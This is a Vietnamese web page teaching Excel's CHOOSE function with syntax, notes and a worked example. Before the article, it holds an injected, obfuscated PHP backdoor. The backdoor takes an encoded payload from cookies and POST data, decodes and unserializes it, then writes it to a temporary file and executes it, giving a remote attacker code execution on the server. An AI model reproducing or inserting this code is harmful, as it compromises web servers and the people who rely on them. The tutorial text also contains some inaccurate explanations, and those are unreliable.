$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm CHOOSE trong Excel – Tìm kiếm 1 giá trị trong 1 chuỗi giá trị - Tải Chùa

Hàm CHOOSE trong Excel – Tìm kiếm 1 giá trị trong 1 chuỗi giá trị

Rate this post
Hôm nay chúng tôi sẽ giới thiệu đến bạn cách dùng hàm CHOOSE trong Excel dùng để tính toán tìm kiếm giá trị trong chuỗi các giá trị là số hay dữ liệu nhé.

Hàm CHOOSE trong Excel là hàm tính toán với chức năng tìm kiếm một giá trị số hay dữ liệu trong chuỗi các giá trị là số hay dữ liệu. Cụ thể là hàm sẽ cho phép bạn chọn giá trị trong sách sách tối đa 254 giá trị trong 29 mục.

Hàm CHOOSE trong Excel

Hàm CHOOSE trong Excel

Hàm CHOOSE dùng cấu trúc index-num để trả một giá trị trong danh sách các đối số. Ví dụ, nếu giá trị từ 1 đến 30 là giá trị tương ứng với những ngày trong một tháng. Khi chọn một số từ 1 đến 30 ta sẽ sử dụng index-num thì hàm CHOOSE sẽ trả về giá trị trong khoảng 1 – 30 tương ứng với những ngày đó.

Cách dùng hàm CHOOSE trong Excel

Cú pháp:

=CHOOSE(index-num, value1, [value2],…)

Ý nghĩa:

  • Index-num: vị trí giá trị là số hay dữ liệu mà ta muốn tìm kiếm trong các giá trị số hay dữ liệu.
  • Value 1,2,… là những phần tử trong chuỗi giá trị số hay dữ liệu.

Lưu ý:

  • Nếu giá trị index-num là 1 thì giá trị trả về của hàm CHOOSE là 1 và index-num là n thì giá trị trả về tương ứng là n.
  • Trường hợp giá trị index-num nhỏ hơn 1 hoặc lớn hơn giá trị cuối cùng danh sách giá trị số, dữ liệu thì hàm CHOOSE sẽ trả về giá trị #VALUE tức là lỗi.
  • Trường hợp giá trị index-num là phân số thì khi nhập bạn bắt buộc phải bỏ phần nguyên thấp nhất trước khi đưa vào tính toán ra kết quả số liệu.
  • Value 1, value 2,…là giá trị bắt buộc còn những giá trị tiếp theo có thể tùy chọn.

Ví dụ:

Nhìn vảo bảng dưới đây ta có được những thông tin về số thứ tự (STT) và tham số. Hãy áp dụng cách dùng hàm CHOOSE để trả về giá trị số thứ tự thứ 7.

Cách dùng hàm CHOOSE

Ví dụ hàm CHOOSE

Bước 1: Trước tiên các bạn áp dụng đúng cú pháp nhập hàm CHOOSE tại ô C2. Cụ thể bạn nhập công thức: =CHOOSE(7,B2, B3, B4. B5, B6, B7, B8, B9, B10).

Trong đó:

  • 7 là giá trị cần trả về.
  • B2,B3,B4,B5,B6,B7,B8,B9,B10: những tham số trong dãy giá trị tham số.

Hàm CHOOSE

Cú pháp hàm CHOOSE

Bước 2: Nhập đúng công thức thì bạn Enter và đợi giá trị trả về.

Hướng dẫn dùng hàm CHOOSE

Kết quả hàm CHOOSE

Thật đơn giản và dễ dàng thực hiện phải không? Hãy luyện tập ở những ví dụ đơn giản rồi nâng cao mức độ khó để vận dụng hàm một cách hiệu quả nhất. Vậy là chúng tôi vừa mới hướng dẫn bạn cách dùng hàm CHOOSE trong Excel chi tiết nhất. Hy vọng giúp bạn nâng cao kỹ năng sử dụng hàm Excel. Ngoài ra bạn có thể xem thêm hàm MATCH để tìm vị trí dữ liệu trong Excel.